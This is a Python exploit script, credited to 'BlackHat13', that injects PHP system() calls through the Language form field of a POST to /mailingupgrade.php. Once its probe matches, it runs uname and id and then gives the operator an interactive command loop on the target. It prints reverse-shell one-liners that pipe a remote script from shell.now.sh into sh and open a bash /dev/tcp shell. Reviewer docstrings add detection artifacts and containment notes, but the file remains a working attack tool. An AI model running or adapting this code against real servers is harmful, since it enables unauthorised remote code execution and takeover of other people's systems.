import requests
import sys
import urllib.parse
import argparse
# Content type attached to every POST below; the bodies are pre-encoded
# form strings, so requests sends them unchanged.
headers = {"Content-type": "application/x-www-form-urlencoded"}
# Single HTTP session shared by check() and exploit().
req = requests.Session()
def check(target):
    """Probe ``target`` and, on a positive result, start a command loop.

    The probe is a POST to ``<target>/mailingupgrade.php`` whose ``Language``
    form field carries the URL-encoded text ``de{${system("echo asu")}}``.
    The target is reported as vulnerable when the response has status 200
    and its body contains the marker ``asu``.

    Observable artifacts for detection: every request this script sends is
    a POST to ``/mailingupgrade.php`` with ``step=4`` and a ``Language``
    value containing ``%7b$%7bsystem(``. The payload sits in the request
    body, so logging that records only the request line will show the POST
    but presumably not the command.

    NOTE(review): the page does not name the affected product or a fixed
    version; blocking or removing access to the upgrade script looks like
    the obvious containment, to be confirmed against vendor guidance.
    """
    print("[DEBUG] Sending Payload To the Target...")
    probe_body = r"step=4&Language=de%7b$%7bsystem(%22echo asu%22)%7d%7d&RegName=12345678901234567890123&RegNumber=12345&NextBtn=Weiter+%3E"
    reply = req.post(f"{target}/mailingupgrade.php", data=probe_body, headers=headers)

    # NOTE(review): the marker "asu" is also part of the submitted payload,
    # so a server that merely reflects the Language value without running it
    # would still match; treat a positive verdict as unconfirmed.
    if "asu" not in reply.text or reply.status_code != 200:
        # The red colour escape is never reset after this message.
        print("\033[91m[ERR] Not Vulnerable:")
        return

    print("[OK] The target is vulnerable")
    print('''
+-----------[Reverse Shell Cheatsheet]-----------+
| > curl https://shell.now.sh/urip:port | sh |
| > bash -i >& /dev/tcp/urip/port 0>&1 |
+------------------------------------------------+
''')
    # Two fixed commands run first, then whatever the operator types.
    for fixed_command in ("uname -a", "id"):
        exploit(target, fixed_command)
    # iter() with a sentinel stops as soon as the operator enters "exit".
    for command in iter(lambda: input("Shell Command> "), "exit"):
        exploit(target, command)
        print('type "exit" to exit')
    sys.exit()
def exploit(target, command):
    """Send one command through the ``Language`` field and print the reply.

    ``command`` is percent-encoded with ``urllib.parse.quote`` and placed
    between the encoded quotes of the ``system(...)`` call in the form body,
    which is then POSTed to ``<target>/mailingupgrade.php``. The response
    text is printed after removing the language-file error message.

    Nothing here inspects the status code or sets a timeout, so an error
    page is printed like any other output. On the wire this request has the
    same shape as the probe in check(); only the text inside
    ``system(%22...%22)`` changes.
    """
    quoted_command = urllib.parse.quote(command)
    body = "".join((
        r"step=4&Language=de%7b$%7bsystem(%22",
        quoted_command,
        r"%22)%7d%7d&RegName=12345678901234567890123&RegNumber=12345&NextBtn=Weiter+%3E",
    ))
    reply = req.post(f"{target}/mailingupgrade.php", data=body, headers=headers)
    # Strip the error message so that only the command output is shown.
    language_error = "Can't load correct language file in /language directory"
    print(reply.text.replace(language_error, ""))
def main():
    """Print the banner, read ``-u <target url>`` and hand it to check().

    With no command-line arguments at all the help text is printed and the
    script exits. ``-u`` is not marked as required, so an invocation that
    passes other arguments but omits it reaches check() with ``None``.
    """
    print('''
\033[
oooooooooo. oooo oooo ooooo ooooo . .o .oooo.
`888' `Y8b `888 `888 `888' `888' .o8 o888 .dP""Y88b
888 888 888 .oooo. .ooooo. 888 oooo 888 888 .oooo. .o888oo 888 ]8P'
888oooo888' 888 `P )88b d88' `"Y8 888 .8P' 888ooooo888 `P )88b 888 888 <88b.
888 `88b 888 .oP"888 888 888888. 888 888 .oP"888 888 888 `88b.
888 .88P 888 d8( 888 888 .o8 888 `88b. 888 888 d8( 888 888 . 888 o. .88P
o888bood8P' o888o `Y888""8o `Y8bod8P' o888o o888o o888o o888o `Y888""8o "888" o888o `8bd88P'
\033[92m Remote Code Execution By BlackHat13
\033[91m Author : 0fficial_BlackHat13
''')
    cli = argparse.ArgumentParser(description='\033[96mHelp..', add_help=True)
    cli.add_argument(
        '-u',
        action="store",
        dest="target",
        help='target url ex. http://target.com/',
    )
    options = cli.parse_args()
    # The no-argument case is only checked after parsing, as in the original.
    invoked_without_arguments = len(sys.argv) == 1
    if invoked_without_arguments:
        cli.print_help()
        sys.exit()
    check(options.target)
# Run main() only when the file is executed as a script, not on import.
if __name__ == "__main__":
    main()